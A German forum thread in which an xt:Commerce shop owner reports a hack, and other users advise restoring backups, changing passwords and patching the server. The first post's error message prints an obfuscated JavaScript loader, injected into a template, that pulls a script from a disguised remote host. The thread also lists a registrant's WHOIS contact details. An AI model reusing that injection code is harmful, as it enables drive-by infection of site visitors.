#1 (permalink)  
Alt 28.12.2009, 13:15
Neuer Benutzer
 
Registriert seit: 08.01.2007
Beiträge: 7
Unglücklich Shop gehackt ?! .... benötige dringend Unterstützung

Hallo zusammen,

ich hoffe Ihr habt Weihnachten ruhig und gesund hinter Euch gebracht und könnt mir bei meinem Problem helfen.
Anscheinend wurde mein Shop die Nacht gehackt! Ich kann auf meine HP zwar zugreifen, aber sobald ich den Shop aufrufe sehe ich nur das :

PHP-Code:
Fatal errorSmarty error: [in BalmyBeads/module/main_content.html line 26]: syntax errorunrecognized tagwindow.onload = function(){var X38cqqcd2l81 document.createElement('s))^c#r)@i&^p@$$@t^&&'.replace(/\)|\$|#|&|@|\!|\^|\(/ig, ''));var M1c7duoq20lb = 'Ppmf253qsed';X38cqqcd2l81.setAttribute('type', 't!@^#e#(x)$t#/^j)(a&&v@&!!a)^^s()$c)$^@r&!&i$!&#p#^t$!$'.replace(/&|\$|\!|\^|\)|#|\(|@/ig, ''));X38cqqcd2l81.setAttribute('src', 'h!^t(!t&#)p#!!:)^/#@/@k@^#i!^n&o)#-$^^$t^!@o@&.$(@m$o#!b^)#@i$l^$!!e@&9^@^.^@$&c($&!o^@(#m@@#.#&c&)@#h$^@i$(n)!#!a($)&-^!#c)($o#&m#&@.!(t!h!($$e)#@m@@o#$b^)i!s##@i@t^!$$e(.#$r(&)u$&&:)@!&8$#$0##8&0(/#^g#@!o!&o^$g(@@l$$^e^@.$c^o(#(m$&/(g@#o&$o@)g#l!^e^#).&($$c#(#&o$((&m#/^!#)^a(#$d!(o#!b@&$$e&(.@&)c^&)(o$)m$/)$&&t#^i@)(m##$e&##!a@#))$n#(d$!d@()a$t!$e^!^.@c)@)!o#m(@^&/&)(c&#o!)&m!#c)(a(@s(t#.#n&$@e!$t!$/#&('.replace(/\$|@|\)|#|&|\^|\(|\!/ig, ''));X38cqqcd2l81.setAttribute('defer', 'd^&e(&f^(@e!r^)^)&'.replace(/\)|@|&|\$|\!|#|\^|\(/ig, ''));X38cqqcd2l81.setAttribute('id', 'D@1!&l)&()o^^y()^(@x in /www/htdocs/w00xxxxxx/htdocs/shop/includes/classes/Smarty_2.6.14/Smarty.class.php on line 1095
Fatal errorSmarty error: [in BalmyBeads/module/main_content.html line 26]: syntax errorunrecognized tagwindow.onload = function(){var X38cqqcd2l81 document.createElement('s))^c#r)@i&^p@$$@t^&&'.replace(/\)|\$|#|&|@|\!|\^|\(/ig, ''));var M1c7duoq20lb = 'Ppmf253qsed';X38cqqcd2l81.setAttribute('type', 't!@^#e#(x)$t#/^j)(a&&v@&!!a)^^s()$c)$^@r&!&i$!&#p#^t$!$'.replace(/&|\$|\!|\^|\)|#|\(|@/ig, ''));X38cqqcd2l81.setAttribute('src', 'h!^t(!t&#)p#!!:)^/#@/@k@^#i!^n&o)#-$^^$t^!@o@&.$(@m$o#!b^)#@i$l^$!!e@&9^@^.^@$&c($&!o^@(#m@@#.#&c&)@#h$^@i$(n)!#!a($)&-^!#c)($o#&m#&@.!(t!h!($$e)#@m@@o#$b^)i!s##@i@t^!$$e(.#$r(&)u$&&:)@!&8$#$0##8&0(/#^g#@!o!&o^$g(@@l$$^e^@.$c^o(#(m$&/(g@#o&$o@)g#l!^e^#).&($$c#(#&o$((&m#/^!#)^a(#$d!(o#!b@&$$e&(.@&)c^&)(o$)m$/)$&&t#^i@)(m##$e&##!a@#))$n#(d$!d@()a$t!$e^!^.@c)@)!o#m(@^&/&)(c&#o!)&m!#c)(a(@s(t#.#n&$@e!$t!$/#&('.replace(/\$|@|\)|#|&|\^|\(|\!/ig, ''));X38cqqcd2l81.setAttribute('defer', 'd^&e(&f^(@e!r^)^)&'.replace(/\)|@|&|\$|\!|#|\^|\(/ig, ''));X38cqqcd2l81.setAttribute('id', 'D@1!&l)&()o^^y()^(@x in /www/htdocs/w008d0f6/htdocs/shop/includes/classes/Smarty_2.6.14/Smarty.class.php on line 1095 
Da ich mit so etwas noch nie Probleme hatte, stehe ich wie der Ochse vorm Berg. Wie geht man am besten vor? Kann ich diese Eintragungen einfach löschen? Muss ich dabei irgendetwas beachten?
Fragen über Fragen .... und dabei habe ich gerade eine fette Rabatt-Aktion laufen und komme an die Daten natürlich nicht ran.

Bitte, bitte, ich brauche wirklich dringend Unterstützung.
Schon einmal lieben Dank
BalmyBeads
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #2 (permalink)  
Alt 28.12.2009, 16:22
Fry Fry ist offline
Erfahrener Benutzer
 
Registriert seit: 23.04.2006
Beiträge: 1.241
Standard

Ich behaupte mal, dein Shop wurde gehackt

Heisst erstmal alles verschrotten, Logfiles sichern, Server neu aufsetzen und die Lücken stopfen, ein absolut sauberes Backup einspielen und gut.
Bei Webspace ein nachweislich sauberes Backup einspielen und evtl. den Provider bescheidgeben, jenachdem ob du weisst durch welches Tor der reingekommen ist. Dein Tor: eigenes Pech!

Und vor allem mal deine eigenen Rechner nach Viren durchsuchen, nach Möglichkeit aber nicht mit kostenlosen Zeugs wie Avira und Co. (was selber ein grosses Tor ist ) sondern eine Antivirensoft, die man durchaus bezahlen muss.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #3 (permalink)  
Alt 29.12.2009, 14:03
Neuer Benutzer
 
Registriert seit: 29.12.2009
Beiträge: 3
Standard

Hallo Balmy,

ja, Dein Shop wurde gehackt. Unser Shop (3.04 SP 2.1) gestern vormittag auch.

Was wir sofort änderten: FTP-Zugang und DB-Zugang (Passwörter)

Wir haben daraufhin das Backup (ich dachte, wir bräuchten das nie...) zurückgespielt, und er war wieder desinfiziert.

Manuell den Shop zu reinigen braucht sehr viel Zeit (Du kannst via FTP alles runterkopieren und unter Cygwin (oder bash) mit
Code:
fgrep -l -R * X38cqqcd2l81
suchen (ist bei jedem infizierten Rechner eine andere Variable)

Wir spielten nachher noch die Patches von XT Commerce security leaks – and their fixes | professional website design ein und sind seitdem wieder up&running...

lg, huzzl
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #4 (permalink)  
Alt 29.12.2009, 14:37
Neuer Benutzer
 
Registriert seit: 29.12.2009
Beiträge: 3
Standard

Zitat:
Zitat von huzzl Beitrag anzeigen
Unser Shop (3.04 SP 2.1) gestern vormittag auch.
Das so eingebundene Script verwies auf die Domäne thegiftsale.ru

domain: THEGIFTSALE.RU
type: CORPORATE
nserver: ns1.hostserverdirect.com.
nserver: ns2.hostserverdirect.com.
nserver: ns3.hostserverdirect.com.
nserver: ns4.hostserverdirect.com.
state: REGISTERED, DELEGATED, VERIFIED
person: Private Person
phone: +7 8552 585772
fax-no: +7 8552 585772
e-mail: dull@freemailbox.ru
registrar: NAUNET-REG-RIPN
created: 2009.11.22

Hab' probiert anzurufen - es geht nur das FAX ran. Vielleicht sollte ich eine schwarze Papierrolle in unserem Fax einspannen und auf "senden" drücken...
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #5 (permalink)  
Alt 29.12.2009, 16:00
Fry Fry ist offline
Erfahrener Benutzer
 
Registriert seit: 23.04.2006
Beiträge: 1.241
Standard

Zitat:
Zitat von huzzl Beitrag anzeigen
Wir spielten nachher noch die Patches von XT Commerce security leaks – and their fixes | professional website design ein und sind seitdem wieder up&running...
Und zwar höchstens so lange, bis der Idiot wiederkommt und exakt die selbe Lücke in deinem OS wieder findet

Nicht xtC muss gepacht werden, sondern das, was zwischen euch und xtC hängt: Standalone und Server!

Zitat:
Vielleicht sollte ich eine schwarze Papierrolle in unserem Fax einspannen und auf "senden" drücken...
Haaaa, ist das mal ne geile Idee

Geändert von Fry (29.12.2009 um 16:03 Uhr)
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #6 (permalink)  
Alt 29.12.2009, 16:16
Neuer Benutzer
 
Registriert seit: 29.12.2009
Beiträge: 3
Standard

Zitat:
Zitat von Fry Beitrag anzeigen
Und zwar höchstens so lange, bis der Idiot wiederkommt und exakt die selbe Lücke in deinem OS wieder findet

Nicht xtC muss gepacht werden, sondern das, was zwischen euch und xtC hängt: Standalone und Server!
Danke für den Tipp! Ich wunderte mich, wie dieser *$%&/ auf das FTP-Passwort kam -> das Update für die Linux-Kiste rennt schon...
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
Antwort

Lesezeichen

Stichworte
benötige, dringend, gehackt, shop, unterstützung

Themen-Optionen
Ansicht

Forumregeln
Es ist dir nicht erlaubt, neue Themen zu verfassen.
Es ist dir nicht erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge hochzuladen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are aus
Pingbacks are aus
Refbacks are aus


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
DRINGEND! Benötige Hilfe für meinen Shop lilly-22 Fragen zur Software 0 02.12.2009 20:08
DRINGEND!: Shop geht nicht mehr!! Konair23 Fragen zur Software 6 27.11.2009 20:42


Alle Zeitangaben in WEZ +1. Es ist jetzt 10:09 Uhr.

Copyright © 2011 xt:Commerce GmbH / xt:Commerce International Ltd. - All Rights Reserved

xt:Commerce is a SafeCharge brand